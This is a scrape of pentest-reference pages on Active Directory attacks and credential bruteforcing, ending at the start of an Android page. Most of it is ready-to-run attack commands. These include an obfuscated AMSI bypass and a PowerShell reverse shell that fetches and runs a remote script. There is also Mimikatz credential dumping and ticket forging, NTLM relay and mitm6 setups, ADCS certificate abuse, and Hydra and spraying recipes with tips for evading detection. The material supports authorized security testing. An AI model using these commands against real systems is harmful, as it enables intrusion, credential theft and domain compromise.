[PreviousOnline hashes cracked](https://www.pentest-book.com/enumeration/web/online-hashes-cracked) [NextLFI/RFI](https://www.pentest-book.com/enumeration/web/lfi-rfi) Last updated 3 years ago Was this helpful? Was this helpful? --- # AD | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/post-exploitation/windows/ad.md) . > **Skill Level**: Intermediate to Advanced **Prerequisites**: Windows internals, networking, Kerberos basics [](https://www.pentest-book.com/post-exploitation/windows/ad#info) Info ---------------------------------------------------------------------------- ### [](https://www.pentest-book.com/post-exploitation/windows/ad#basic-active-directory-terms) Basic Active Directory terms #### [](https://www.pentest-book.com/post-exploitation/windows/ad#users) Users Agent represented by a user account. * Regular user accounts (used by employees or for specific task as backups) * Computer accounts (ends with $). Computers in AD are a users subclass. #### [](https://www.pentest-book.com/post-exploitation/windows/ad#services) Services * Identified by SPN which indicates the service name and class, the owner and the host computer. * Is executed in a computer (the host of the service) as a process. * Services (as any process) are running in the context of a user account, with the privileges and permissions of that user. * The SPN’s of the services owned by an user are stored in the attribute ServicePrincipalName of that account. * Usually Domain Admin or similar role is required to modify the SPN’s of a user. [](https://www.pentest-book.com/post-exploitation/windows/ad#general) General ---------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/windows/ad#common-vulns) Common vulns -------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/windows/ad#quick-tips) Quick tips ---------------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/windows/ad#relay-attacks-flow) Relay attacks flow -------------------------------------------------------------------------------------------------------- [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fwww.trustedsec.com%2Ffavicons%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=754cf357&sv=2)I’m bringing relaying back: A comprehensive guide on relaying anno…TrustedSec](https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022) ### [](https://www.pentest-book.com/post-exploitation/windows/ad#scan) Scan ### [](https://www.pentest-book.com/post-exploitation/windows/ad#basic-attack-a) Basic attack A ### [](https://www.pentest-book.com/post-exploitation/windows/ad#basic-attack-b-socks-proxy) Basic attack B (socks proxy) ### [](https://www.pentest-book.com/post-exploitation/windows/ad#ldap-enum) LDAP Enum [](https://www.pentest-book.com/post-exploitation/windows/ad#ipv6-dns-takeover-via-mitm6) IPv6 DNS Takeover via Mitm6 -------------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/windows/ad#ldap-complete-guide) LDAP complete guide ---------------------------------------------------------------------------------------------------------- [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fmalicious.link%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=8a1333a3&sv=2)LDAPSearch ReferenceMy cool site](https://malicious.link/post/2022/ldapsearch-reference/) [](https://www.pentest-book.com/post-exploitation/windows/ad#a-d-mindmap) AD Mindmap ----------------------------------------------------------------------------------------- [https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest\_ad\_dark\_2022\_11.svgorange-cyberdefense.github.io](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg) [https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest\_ad\_dark\_2022\_11.svg](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg) [https://t.co/hE0VKO5b2I?amp=1t.co](https://t.co/hE0VKO5b2I?amp=1) [https://www.xmind.net/m/5dypm8/www.xmind.net](https://www.xmind.net/m/5dypm8/) [](https://www.pentest-book.com/post-exploitation/windows/ad#dacl-mindmap) DACL mindmap -------------------------------------------------------------------------------------------- ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-M5x1LJiRQvXWpt04_ee%252Fuploads%252FiyVpxIJXpBqkt6uXbLLb%252Fimage.png%3Falt%3Dmedia%26token%3D3aa4e6bd-42fb-4b65-925f-7583c568dfa7&width=768&dpr=3&quality=100&sign=e8d619c2&sv=2) [](https://www.pentest-book.com/post-exploitation/windows/ad#a-d-certificate-services-adcs-attacks) AD Certificate Services (ADCS) Attacks ----------------------------------------------------------------------------------------------------------------------------------------------- AD CS is a common attack vector in modern AD environments. Misconfigured certificate templates can lead to domain compromise. ### [](https://www.pentest-book.com/post-exploitation/windows/ad#enumeration) Enumeration ### [](https://www.pentest-book.com/post-exploitation/windows/ad#esc1-template-misconfiguration) ESC1 - Template Misconfiguration ### [](https://www.pentest-book.com/post-exploitation/windows/ad#esc4-vulnerable-template-acls) ESC4 - Vulnerable Template ACLs ### [](https://www.pentest-book.com/post-exploitation/windows/ad#esc8-ntlm-relay-to-adcs) ESC8 - NTLM Relay to ADCS ### [](https://www.pentest-book.com/post-exploitation/windows/ad#shadow-credentials) Shadow Credentials ### [](https://www.pentest-book.com/post-exploitation/windows/ad#unpac-the-hash) UnPAC the Hash ### [](https://www.pentest-book.com/post-exploitation/windows/ad#krbrelayup) KrbRelayUp [](https://www.pentest-book.com/post-exploitation/windows/ad#related-topics) Related Topics ------------------------------------------------------------------------------------------------ * [Kerberos Attacks](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks) - Kerberoasting, AS-REP, etc. * [Windows Post-Exploitation](https://www.pentest-book.com/post-exploitation/windows) - General Windows attacks * [Win11 Evasion](https://www.pentest-book.com/post-exploitation/windows/win11-evasion) - Modern Windows security [PreviousWin11/Server2022 Evasion](https://www.pentest-book.com/post-exploitation/windows/win11-evasion) [NextKerberos](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks) Last updated 5 months ago Was this helpful? * [Info](https://www.pentest-book.com/post-exploitation/windows/ad#info) * [Basic Active Directory terms](https://www.pentest-book.com/post-exploitation/windows/ad#basic-active-directory-terms) * [General](https://www.pentest-book.com/post-exploitation/windows/ad#general) * [Common vulns](https://www.pentest-book.com/post-exploitation/windows/ad#common-vulns) * [Quick tips](https://www.pentest-book.com/post-exploitation/windows/ad#quick-tips) * [Relay attacks flow](https://www.pentest-book.com/post-exploitation/windows/ad#relay-attacks-flow) * [Scan](https://www.pentest-book.com/post-exploitation/windows/ad#scan) * [Basic attack A](https://www.pentest-book.com/post-exploitation/windows/ad#basic-attack-a) * [Basic attack B (socks proxy)](https://www.pentest-book.com/post-exploitation/windows/ad#basic-attack-b-socks-proxy) * [LDAP Enum](https://www.pentest-book.com/post-exploitation/windows/ad#ldap-enum) * [IPv6 DNS Takeover via Mitm6](https://www.pentest-book.com/post-exploitation/windows/ad#ipv6-dns-takeover-via-mitm6) * [LDAP complete guide](https://www.pentest-book.com/post-exploitation/windows/ad#ldap-complete-guide) * [AD Mindmap](https://www.pentest-book.com/post-exploitation/windows/ad#a-d-mindmap) * [DACL mindmap](https://www.pentest-book.com/post-exploitation/windows/ad#dacl-mindmap) * [AD Certificate Services (ADCS) Attacks](https://www.pentest-book.com/post-exploitation/windows/ad#a-d-certificate-services-adcs-attacks) * [Enumeration](https://www.pentest-book.com/post-exploitation/windows/ad#enumeration) * [ESC1 - Template Misconfiguration](https://www.pentest-book.com/post-exploitation/windows/ad#esc1-template-misconfiguration) * [ESC4 - Vulnerable Template ACLs](https://www.pentest-book.com/post-exploitation/windows/ad#esc4-vulnerable-template-acls) * [ESC8 - NTLM Relay to ADCS](https://www.pentest-book.com/post-exploitation/windows/ad#esc8-ntlm-relay-to-adcs) * [Shadow Credentials](https://www.pentest-book.com/post-exploitation/windows/ad#shadow-credentials) * [UnPAC the Hash](https://www.pentest-book.com/post-exploitation/windows/ad#unpac-the-hash) * [KrbRelayUp](https://www.pentest-book.com/post-exploitation/windows/ad#krbrelayup) * [Related Topics](https://www.pentest-book.com/post-exploitation/windows/ad#related-topics) Was this helpful? Copy # Anonymous Credential LDAP Dumping: ldapsearch -LLL -x -H ldap:// -b ā€˜ā€™ -s base ā€˜(objectclass=*)’ # Impacket GetADUsers.py (Must have valid credentials) GetADUsers.py -all -dc-ip # Impacket lookupsid.py /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0 # Windapsearch: # https://github.com/ropnop/windapsearch python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U # Go version https://github.com/ropnop/go-windapsearch # CME cme smb IP -u '' -p '' --users --shares # BloodHound # https://github.com/BloodHoundAD/BloodHound/releases # https://github.com/BloodHoundAD/SharpHound3 # https://github.com/chryzsh/DarthSidious/blob/master/enumeration/bloodhound.md Import-Module .\sharphound.ps1 . .\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All Invoke-BloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password # Bloodhound.py (no shell needed) remote, ldap auth https://github.com/fox-it/BloodHound.py bloodhound-python -u -p '' -ns -d -c all # BloodHound Cheatsheet # https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/ # Bloodhound raw queries # https://github.com/xenoscr/Useful-BloodHound-Queries # Bloodhound complements # https://github.com/RastreatorTeam/rastreator # https://github.com/kaluche/bloodhound-quickwin # https://github.com/knavesec/Max # https://github.com/improsec/ImproHound # https://github.com/fox-it/aclpwn.py # Get BH data from LDAP https://github.com/c3c/ADExplorerSnapshot.py # Rubeus # https://github.com/GhostPack/Rubeus ## ASREProasting: Rubeus.exe asreproast /format: /outfile: ## Kerberoasting: Rubeus.exe kerberoast /outfile: Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] ## Pass the key (PTK): .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt # Using the ticket on a Windows target: Rubeus.exe ptt /ticket: # Password Spraying tool https://github.com/dafthack/DomainPasswordSpray # Kerberoast https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 # Powerview https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 Find-InterestingDomainShareFile –CheckAccess # AD Cheatsheets https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet # References: https://wadcoms.github.io/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise https://github.com/infosecn1nja/AD-Attack-Defense https://adsecurity.org/?page_id=1821 https://github.com/sense-of-security/ADRecon https://adsecurity.org/?p=15 https://adsecurity.org/?cat=7 https://adsecurity.org/?page_id=4031 https://www.fuzzysecurity.com/tutorials/16.html https://blog.stealthbits.com/complete-domain-compromise-with-golden-tickets/ http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain https://adsecurity.org/?p=1588 http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html https://www.harmj0y.net/blog/tag/powerview/ https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos https://github.com/dievus/Oh365UserFinder https://o365blog.com/aadinternals/ Copy # Users having rights to add computers to domain add-computer –domainname org.local -Credential ORG\john -restart –force # AdminCount attribute set on common users python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1 jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json Import-Module ActiveDirectory Get-AdObject -ldapfilter "(admincount=1)" -properties admincount # High number of users in privileged groups net group "Schema Admins" /domain net group "Domain Admins" /domain net group "Enterprise Admins" /domain runas /netonly /user:\ cmd.exe - Linux: net rpc group members 'Schema Admins' -I -U ""%"" net rpc group members 'Domain Admins' -I -U ""%"" net rpc group members 'Enterprise Admins' -I -U ""%"" net rpc group members 'Domain Admins' -I 10.10.30.52 -U "john"%"pass123" # Service accounts being members of Domain Admins net group "Schema Admins" /domain net group "Domain Admins" /domain net group "Enterprise Admins" /domain # Excessive privileges allowing for shadow Domain Admins Bloodhound/Sharphound # Service accounts vulnerable to Kerberoasting GetUserSPNs.py -request example.com/john:pass123 hashcat -m 13100 -a 0 -O --self-test-disable hashes.txt wordlist.txt # Users with non-expiring passwords python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1 grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}' - PS Import-Module ActiveDirectory Get-ADUser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq "true" } | where {$_.enabled -eq "true" } # Users with password not required python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1 grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}' - PS Import-Module ActiveDirectory Get-ADUser -Filter {UserAccountControl -band 0x0020} # Storing passwords using reversible encryption mimikatz # lsadump::dcsync /domain:example.com /user:poorjohn # Storing passwords using LM hashes - In NTDS.dit grep -iv ':aad3b435b51404eeaad3b435b51404ee:' dumped_hashes.txt # Service accounts vulnerable to AS-REP roasting GetNPUsers.py example.com/ -usersfile userlist.txt -format hashcat -no-pass GetNPUsers.py example.com/john:pass123 -request -format hashcat hashcat -m 18200 -a 0 -O --self-test-disable hashes.txt wordlist.txt - PS Import-Module ActiveDirectory Get-ADuser -filter * -properties DoesNotRequirePreAuth | where {$._DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name # Weak domain password policy net accounts /domain polenum --username john --password pass123 --domain 10.10.51.11 enum4linux -P -u john -p pass123 -w dom.local 172.21.1.60 # Inactive domain accounts python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1 sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}' # Privileged users with password reset overdue python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1 jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \ grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}' # Users with a weak password $a = [adsisearcher]ā€(&(objectCategory=person)(objectClass=user))ā€ $a.PropertiesToLoad.add(ā€œsamaccountnameā€) | out-null $a.PageSize = 1 $a.FindAll() | % { echo $_.properties.samaccountname } > users.txt Import-Module ./adlogin.ps1 adlogin users.txt domain.com password123 # Credentials in SYSVOL and Group Policy Preferences (GPP) findstr /s /n /i /p password \\example.com\sysvol\example.com\* mount.cifs -o domain=example.com,username=john,password="pass@123" //10.10.139.115/SYSVOL /mnt grep -ir 'password' /mnt Copy # Amsi bypass sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) # Powershell Execution policy Bypass powershell -ep bypass # To input the output of the first command into second command use this powershell technique # %{} is an alias for ForEach-Object{} # ?{} is an alias for Where-Object{} # $_ is variable | %{ - $_} # To filter out an object type we can use this technique with pipe. ?{$_. -eq '’'} # Find local admin access Find-LocalAdminAccess # Get Domain sid Get-DomainSID Arguments -Domain ā€œdomain nameā€ # Get DC Get-NetDomainController Arguments -Domain ā€œdomain nameā€ # Get users in current domain Get-NetUser Arguments -UserName ā€œusernameā€ # Get user properties Get-UserProperty Arguments -Properties pwdlastset # Search for a particular string in a user's attributes Find-UserField -SearchField Description -SearchTerm ā€builtā€ # Get all computers Get-NetComputer -FullData Many arguments -OperatingSystem -Ping -FullData # Get groups Get-NetGroup Arguments -FullData -Domain # Get members of a particular group Get-NetGroupMember -GroupName "Domain Admins" # Group Policies Get-NetGPO Get-NetGPO -ComputerName Get-NetGPOGroup # Get users that are part of a Machine's local Admin group Find-GPOComputerAdmin -ComputerName # Get OUs Get-NetOU -FullData Get-NetGPO -GPOname # Mapping forest Get-NetForest -Verbose Get-NetForestDomain -Verbose # Mapping trust Get-NetDomainTrust Arguments -Domain Get-NetForestDomain -Verbose | Get-NetDomainTrust # Finding Constrained Delegation Get-DomainUser -TrustedToAuth (Poweview Dev.) # Finding UnConstrained Delegation Get-NetComputer -UnConstrained # Get ACLs Get-ObjectAcl -SamAccountName -ResolveGUIDs Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose # Search for interesting ACEs Invoke-ACLScanner -ResolveGUIDs # Reverse Shell powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.113/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443 powershell.exe iex (iwr http://172.16.100.113/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.113 -Port 443 #Mimikatz # Make ntlm ps-session Invoke-Mimikatz -Command '"sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe"' # Dump creds Invoke-Mimikatz Invoke-Mimikatz -Command ā€˜ā€œlsadump::lsa /patchā€ā€™ Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"' (dcsync requires 3 permission ) # Tickets Inject ticket:- Invoke-Mimikatz -Command '"kerberos::ptt "' Export Tickets:- Invoke-Mimikatz -Command '"sekurlsa::tickets /export"' # Golden tkt Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /krbtgt: id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' # Silver tkt Invoke-Mimikatz -Command '"kerberos::golden /domain: /sid: /target: /service: /rc4: /user: /ptt"' # TGT tkt kekeo.exe tgt::ask /user: /domain: /rc4: # TGS tkt Kekeo.exe tgs::s4u /tgt:tgt_ticket.kirbi /user:@ /service:/ Copy # First just listen sudo responder -I eth0 -A # Check SMB signing disabled crackmapexec smb 10.10.10.0/24 --gen-relay-list smb_sign_disabled.txt Copy # Modify responder.cfg to disable HTTP and SMB servers # Start ntmlrelay.py against smb_sign_disabled.txt hosts list ntlmrelayx.py -tf smb_sign_disabled.txt # Then start responder in attack mode responder -rdP -I eth0 # Cracking NTLMv2 hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt --force Copy # Modify responder.cfg to disable HTTP and SMB servers # Start ntmlrelay.py against smb_sign_disabled.txt hosts list ntlmrelayx.py -tf smb_sign_disabled.txt -smb2support -socks # Edit proxychains4.conf to: socks4 127.0.0.1 1080 # Run secretsdump proxychains secretsdump.py dcname\user:password@10.10.10.X # Even smbclient proxychains smbclient.py dcname\user:password@10.10.10.X Copy ntlmrelayx.py -t ldap://10.10.10.10 -smb2support Copy git clone https://github.com/fox-it/mitm6.git pip install mitm6 mitm6 -d domain.name # During before step, in other terminal run ntlmrelayx.py -6 -t ldaps://192.168.176.129 -wh fakewpadhost.domain.name -l dir Copy # Certipy - Find vulnerable templates certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.10 # Certify (C#) Certify.exe find /vulnerable # Check CA permissions Certify.exe cas # Manual LDAP query for templates ldapsearch -x -H ldap://DC -b "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" Copy # Conditions: # - ENROLLEE_SUPPLIES_SUBJECT enabled # - Client Authentication or Smart Card Logon EKU # - Enrollment rights for low-privileged users # Exploit with Certipy certipy req -u user@domain.local -p 'Password123' -dc-ip 10.10.10.10 \ -target CA.domain.local -ca 'domain-CA' \ -template 'VulnerableTemplate' -upn administrator@domain.local # Authenticate with certificate certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 Copy # User can modify template permissions # Modify template, then exploit like ESC1 certipy template -u user@domain.local -p 'Password123' \ -template 'VulnerableTemplate' -save-old # Exploit modified template certipy req -u user@domain.local -p 'Password123' \ -template 'VulnerableTemplate' -upn administrator@domain.local Copy # Relay NTLM to HTTP enrollment endpoint # Requires: Web enrollment enabled # Start relay ntlmrelayx.py -t http://CA/certsrv/certfnsh.asp -smb2support --adcs --template DomainController # Coerce authentication (PetitPotam, PrinterBug, etc.) python3 PetitPotam.py attacker-ip DC-ip # Use obtained certificate certipy auth -pfx dc.pfx -dc-ip 10.10.10.10 Copy # Add key credential to target user/computer # Requires: Write permission on msDS-KeyCredentialLink # Certipy certipy shadow auto -u user@domain.local -p 'Password123' -account 'target$' # Whisker (C#) Whisker.exe add /target:targetuser # pyWhisker python3 pywhisker.py -d domain.local -u user -p 'Password123' \ --target 'targetuser' --action 'add' Copy # Get NT hash from certificate (U2U) certipy auth -pfx user.pfx -dc-ip 10.10.10.10 -ldap-shell # Or with Rubeus Rubeus.exe asktgt /user:user /certificate:user.pfx /getcredentials Copy # Local privilege escalation via Kerberos relay # Works when: LDAP signing not enforced KrbRelayUp.exe relay -Domain domain.local -CreateNewComputerAccount -ComputerName YOURPC$ -ComputerPassword Password123 # Or with ADCS KrbRelayUp.exe relay -Domain domain.local -CreateNewComputerAccount -ComputerName YOURPC$ -ComputerPassword Password123 -Method ADCS -CAEndpoint CA.domain.local --- # Bruteforcing | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/web/bruteforcing.md) . Authentication bruteforcing attacks to guess credentials or bypass login mechanisms. > **Skill Level**: Beginner to Intermediate **Prerequisites**: Basic HTTP understanding, wordlist selection [](https://www.pentest-book.com/enumeration/web/bruteforcing#password-identification) Password Identification ------------------------------------------------------------------------------------------------------------------ Copy # Identify hash type hash-identifier # Name That Hash (better) # https://github.com/HashPals/Name-That-Hash nth --text "5f4dcc3b5aa765d61d8327deb882cf99" # hashid hashid -m '$2a$10$...' # Shows hashcat mode [](https://www.pentest-book.com/enumeration/web/bruteforcing#wordlist-generation) Wordlist Generation ---------------------------------------------------------------------------------------------------------- Copy # CeWL - Generate wordlist from target website cewl https://target.com -d 3 -m 5 -w custom_wordlist.txt cewl https://target.com --with-numbers -d 3 -w wordlist.txt # Generate password variations # https://github.com/edoardottt/longtongue python3 longtongue.py -w base_words.txt -o passwords.txt # Username wordlist from names # https://github.com/AhmedMohamedDev/namemash.py python namemash.py names.txt > usernames.txt [](https://www.pentest-book.com/enumeration/web/bruteforcing#http-bruteforcing) HTTP Bruteforcing ------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/enumeration/web/bruteforcing#hydra) Hydra ### [](https://www.pentest-book.com/enumeration/web/bruteforcing#ffuf) ffuf ### [](https://www.pentest-book.com/enumeration/web/bruteforcing#patator) Patator [](https://www.pentest-book.com/enumeration/web/bruteforcing#service-bruteforcing) Service Bruteforcing ------------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/enumeration/web/bruteforcing#ssh) SSH ### [](https://www.pentest-book.com/enumeration/web/bruteforcing#rdp) RDP ### [](https://www.pentest-book.com/enumeration/web/bruteforcing#ftp) FTP ### [](https://www.pentest-book.com/enumeration/web/bruteforcing#smb) SMB ### [](https://www.pentest-book.com/enumeration/web/bruteforcing#database-services) Database Services ### [](https://www.pentest-book.com/enumeration/web/bruteforcing#other-services) Other Services [](https://www.pentest-book.com/enumeration/web/bruteforcing#evasion-techniques) Evasion Techniques -------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/web/bruteforcing#password-spraying) Password Spraying ------------------------------------------------------------------------------------------------------ [](https://www.pentest-book.com/enumeration/web/bruteforcing#default-credentials) Default Credentials ---------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/web/bruteforcing#wordlists) Wordlists -------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/web/bruteforcing#related-topics) Related Topics ------------------------------------------------------------------------------------------------ * [Password Cracking](https://www.pentest-book.com/others/password-cracking) - Hash cracking * [Wordlist Reference](https://www.pentest-book.com/others/wordlist-reference) - Wordlist selection guide [PreviousHeader injections](https://www.pentest-book.com/enumeration/web/header-injections) [NextOnline hashes cracked](https://www.pentest-book.com/enumeration/web/online-hashes-cracked) Last updated 5 months ago Was this helpful? * [Password Identification](https://www.pentest-book.com/enumeration/web/bruteforcing#password-identification) * [Wordlist Generation](https://www.pentest-book.com/enumeration/web/bruteforcing#wordlist-generation) * [HTTP Bruteforcing](https://www.pentest-book.com/enumeration/web/bruteforcing#http-bruteforcing) * [Hydra](https://www.pentest-book.com/enumeration/web/bruteforcing#hydra) * [ffuf](https://www.pentest-book.com/enumeration/web/bruteforcing#ffuf) * [Patator](https://www.pentest-book.com/enumeration/web/bruteforcing#patator) * [Service Bruteforcing](https://www.pentest-book.com/enumeration/web/bruteforcing#service-bruteforcing) * [SSH](https://www.pentest-book.com/enumeration/web/bruteforcing#ssh) * [RDP](https://www.pentest-book.com/enumeration/web/bruteforcing#rdp) * [FTP](https://www.pentest-book.com/enumeration/web/bruteforcing#ftp) * [SMB](https://www.pentest-book.com/enumeration/web/bruteforcing#smb) * [Database Services](https://www.pentest-book.com/enumeration/web/bruteforcing#database-services) * [Other Services](https://www.pentest-book.com/enumeration/web/bruteforcing#other-services) * [Evasion Techniques](https://www.pentest-book.com/enumeration/web/bruteforcing#evasion-techniques) * [Password Spraying](https://www.pentest-book.com/enumeration/web/bruteforcing#password-spraying) * [Default Credentials](https://www.pentest-book.com/enumeration/web/bruteforcing#default-credentials) * [Wordlists](https://www.pentest-book.com/enumeration/web/bruteforcing#wordlists) * [Related Topics](https://www.pentest-book.com/enumeration/web/bruteforcing#related-topics) Was this helpful? Copy # HTTP GET Form hydra -L users.txt -P passwords.txt target.com http-get-form \ "/login:username=^USER^&password=^PASS^:F=Invalid credentials" # HTTP POST Form hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form \ "/login:user=^USER^&pass=^PASS^:F=Login failed" -V # HTTPS POST Form hydra -l admin -P passwords.txt target.com -s 443 -S https-post-form \ "/login:username=^USER^&password=^PASS^:F=Incorrect" # Basic Auth hydra -L users.txt -P passwords.txt target.com http-get /admin # With cookies hydra -l admin -P passwords.txt target.com http-post-form \ "/login:user=^USER^&pass=^PASS^:F=failed:H=Cookie: session=abc123" Copy # POST login form ffuf -w users.txt:USER -w passwords.txt:PASS \ -u https://target.com/login \ -X POST -d "username=USER&password=PASS" \ -H "Content-Type: application/x-www-form-urlencoded" \ -fc 401 -mc 200,302 # With rate limiting ffuf -w passwords.txt -u https://target.com/login \ -X POST -d "user=admin&pass=FUZZ" \ -rate 10 -fc 401 Copy # HTTP POST patator http_fuzz url=https://target.com/login method=POST \ body='{"user":"admin","password":"FILE0"}' \ 0=/path/to/passwords.txt \ accept_cookie=1 follow=1 \ -x ignore:fgrep='Invalid' # HTTP Basic Auth patator http_fuzz url=https://target.com/admin \ user_pass=FILE0:FILE1 \ 0=users.txt 1=passwords.txt \ -x ignore:code=401 Copy hydra -l root -P passwords.txt ssh://target.com hydra -L users.txt -P passwords.txt target.com ssh -t 4 # Medusa medusa -h target.com -u root -P passwords.txt -M ssh # Ncrack ncrack -p 22 --user root -P passwords.txt target.com Copy hydra -l administrator -P passwords.txt rdp://target.com ncrack -p 3389 --user administrator -P passwords.txt target.com # Crowbar (RDP specific) crowbar -b rdp -s target.com/32 -u admin -C passwords.txt -n 1 Copy hydra -L users.txt -P passwords.txt ftp://target.com hydra -l anonymous -P passwords.txt target.com ftp Copy hydra -L users.txt -P passwords.txt smb://target.com crackmapexec smb target.com -u users.txt -p passwords.txt Copy # MySQL hydra -l root -P passwords.txt mysql://target.com # PostgreSQL hydra -l postgres -P passwords.txt postgres://target.com # MSSQL hydra -l sa -P passwords.txt mssql://target.com # MongoDB nmap -p 27017 --script mongodb-brute target.com Copy # SNMP hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp # SMTP hydra -l user@target.com -P passwords.txt smtp://target.com # POP3 hydra -l user -P passwords.txt pop3://target.com # IMAP hydra -l user -P passwords.txt imap://target.com Copy # Slow down requests hydra -l admin -P passwords.txt target.com http-post-form "/login:..." -t 1 -w 3 # Random User-Agent hydra ... -e nsr # Try null, same as login, reversed # IP rotation (via proxychains) proxychains hydra -l admin -P passwords.txt target.com http-post-form "/login:..." # Add delays between requests ffuf -w passwords.txt -u https://target.com/login -p 0.5-1.0 Copy # Single password against many users # https://github.com/x90skysn3k/brutespray python brutespray.py --file nmap.gnmap -U users.txt -p 'Summer2024!' --threads 5 # CrackMapExec for AD crackmapexec smb dc.target.com -u users.txt -p 'Password123!' --continue-on-success # Spray single password hydra -L users.txt -p 'Welcome1!' target.com http-post-form "/login:..." Copy # Check common default credentials # https://github.com/ihebski/DefaultCreds-cheat-sheet # https://many-passwords.github.io/ # Common defaults to try: admin:admin admin:password root:root test:test guest:guest Copy # Passwords /usr/share/wordlists/rockyou.txt /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt /usr/share/seclists/Passwords/darkweb2017-top10000.txt # Usernames /usr/share/seclists/Usernames/top-usernames-shortlist.txt /usr/share/seclists/Usernames/Names/names.txt --- # Android | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/mobile/android.md) . > **Skill Level**: Intermediate **Prerequisites**: Java/Kotlin basics, Android architecture [](https://www.pentest-book.com/mobile/android#tools) Tools ---------------------------------------------------------------- ### 